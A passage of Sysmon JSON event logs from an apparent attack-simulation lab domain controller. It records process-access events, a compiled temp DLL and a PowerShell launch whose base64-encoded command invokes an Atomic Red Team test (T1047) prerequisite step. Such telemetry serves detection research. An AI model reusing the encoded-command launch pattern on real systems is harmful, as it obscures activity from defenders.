C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-00100EC90700}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-00100EC90700}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:10.018\r\nProcessGuid: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nProcessId: 4284\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.dll\r\nCreationUtcTime: 2020-08-01 07:59:09.908","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:10.018","ProcessGuid":"{41C8662E-20CD-5F25-0000-0010E7C40700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.dll","CreationUtcTime":"2020-08-01 07:59:09.908","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.266\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nProcessId: 2456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nParentProcessId: 4652\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 